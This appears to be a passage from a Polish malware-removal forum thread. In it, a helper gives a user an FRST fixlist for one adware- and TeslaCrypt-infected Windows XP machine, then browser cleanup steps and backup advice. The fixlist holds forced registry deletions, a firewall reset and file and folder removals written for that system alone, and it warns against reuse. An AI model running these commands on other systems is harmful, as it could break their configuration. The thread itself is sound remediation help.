{33564D57-0000-0010-8000-00AA00389B71} hxxp://download.microsoft.com/download/B/0/6/B06D48C0-917B-44E2-92E0-6B3E159624A6/wmv9vcm.cab DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_31-windows-i586.cab DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} hxxp://fpdownload.macromedia.com/get/flashplayer/current/ultrashim.cab DPF: {CAFEEFAC-0016-0000-0006-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_06-windows-i586.cab DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_31-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_31-windows-i586.cab C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji\BabSolution C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji\Babylon C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji\TestApp C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji\Microsoft\Internet Explorer\Quick Launch\MiPony.lnk C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Menu Start\Programy\MiPony C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Pulpit\MiPony.lnk C:\Documents and Settings\All Users\Dane aplikacji\AVG Secure Search C:\Documents and Settings\All Users\Dane aplikacji\MFAData C:\Documents and Settings\All Users\Menu Start\Programy\FlvPlayer C:\Documents and Settings\All Users\Menu Start\Programy\McAfee Security Scan Plus C:\Documents and Settings\All Users\Menu Start\Programy\Nokia PC Internet Access\Nokia PC Internet Access.lnk C:\Documents and Settings\Ja\Skrót do Ja.lnk C:\Documents and Settings\Ja\Dane aplikacji\skype.ini C:\Documents and Settings\Ja\Dane aplikacji\Babylon C:\Documents and Settings\Ja\Dane aplikacji\Desk 365 C:\Documents and Settings\Ja\Dane aplikacji\Mozilla\Extensions C:\Documents and Settings\Ja\Dane aplikacji\StartNow Toolbar C:\Documents and Settings\Ja\Dane aplikacji\StatusWinks C:\Documents and Settings\Ja\Dane aplikacji\Microsoft\Office\Niedawny\*.LNK C:\Documents and Settings\Ja\Menu Start\Programy\BitGuard C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Preferences C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Web Data C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\newtab.crx C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\Torpedo C:\Program Files\Desk 365 C:\Program Files\File Scout C:\Program Files\Java C:\Program Files\VideoDownloadConverter_4z C:\Program Files\WebCake C:\Program Files\Mozilla Firefox\extensions C:\Program Files\Mozilla Firefox\plugins C:\Program Files\Common Files\AVG Secure Search C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\WINDOWS\pss\McAfee Security Scan Plus.lnkCommon Startup C:\WINDOWS\pss\TorpedoCopy.lnkStartup RemoveDirectory: C:\ComboFix(2) DisableService: sptd CMD: del /q C:\ComboFix.txt.id-9850759202_helpme@freespeechmail.org Reg: reg delete HKCU\Software\Google\Chrome\Extensions /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome\Extensions /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Documents and Settings^All Users^Menu Start^Programy^Autostart^McAfee Security Scan Plus.lnk" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Documents and Settings^Ja^Menu Start^Programy^Autostart^TorpedoCopy.lnk" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Desk 365" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths" /s Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" /s Reg: reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" CMD: set CMD: netsh firewall reset CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files\Common Files" CMD: dir /a "C:\Documents and Settings\All Users\Dane aplikacji" CMD: dir /a "C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji" CMD: dir /a "C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Ustawienia lokalne\Dane aplikacji" CMD: dir /a "C:\Documents and Settings\Ja\Dane aplikacji" CMD: dir /a "C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji" EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść przeglądarki z adware: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia potem przeinstalujesz. Menu Historia > Wyczyść całą historię przeglądania. Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj AVG Security Toolbar, Smiley Bar for Facebook (o ile nadal będą widoczne po w/w deinstalacjach). Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 5. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. 6. Gdy potwierdzę wykonanie zadań w nowych logach oraz wykonam poprawki, zapuścisz RakhniDecryptor. Z tym, że będzie problem z dyskiem C, jest na nim bardzo mało miejsca, a dekoder potrzebuje dużo. Dlatego próbuję najpierw czyścić system ze śmieci, bo może się rozszerzyć zakres wolnego miejsca. ==================== Dyski ================================ Drive c: () (Fixed) (Total:68.36 GB) (Free:5.23 GB) NTFS ==>[dysk z komponentami startowymi (Windows XP)] Drive d: (Nowy) (Fixed) (Total:164.52 GB) (Free:144.99 GB) NTFS

Tu i tak klarowało się konwertowanie systemu plików wszystkich partycji na dysku 120, bo partycje są w starym i bardziej awaryjnym systemie plików FAT32. Należy sformatować w NTFS. I skoro plany idą aż tak daleko, to możemy całkowicie sobie darować wykonywanie Fix FRST. Usunięcie partycji wszystko załatwi. Tylko pytanie, czy planujesz ponownie instalować stary system XP? Jeśli to możliwe, to już bym robiła przeskok na najnowszy system. Zdecydowanie polecam, by na nowym dysku 500 trzymać wszystkie dane izolując je od działającego systemu. Ale pamiętaj o tym, że infekcje szyfrujące atakują wszystkie możliwe dyski (w tym sieciowe) dostępne podczas zdarzenia, więc pełnym zabezpieczeniem byłoby przeznaczyć ten dysk na magazyn kopii zapasowych nie podłączany na stałe do komputera.

Fix pomyślnie wykonany. Kończymy: Usuń pobrane narzędzia i ich logi z folderu C:\SpecProgram. Następnie zastosuj jeszcze DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Pliki *.ccc to nie "CTB Locker" (nawet jeśli takie hasło mogłeś widzieć na ekranie ransom) tylko jeden z najnowszych wariantów TeslaCrypt. Odszyfrowanie jest awykonalne technicznie. Dla porównania temat z tą samą infekcją: KLIK. Raporty przedstawiają stan po reinstalacji systemu, więc nie ma również co analizować, czysto. Widzę, że zainstalowałeś ShadowExplorer. Program jest obecnie bezużyteczny w kontekście sprawy. Reinstalacja Windows oznacza, że nawet jeśli jakimś cudem ostały się wtedy punkty Przywracania systemu (prawdopobieństwo bliskie zeru, bo TeslaCrypt je usuwa), to reinstalacja i tak je zniszczyła. Ponadto, nawet gdyby wtedy były punkty Przywracania, to tylko dla dysku C, bo domyślnie Przywracanie jest aktywowane tylko dla partycji systemowej.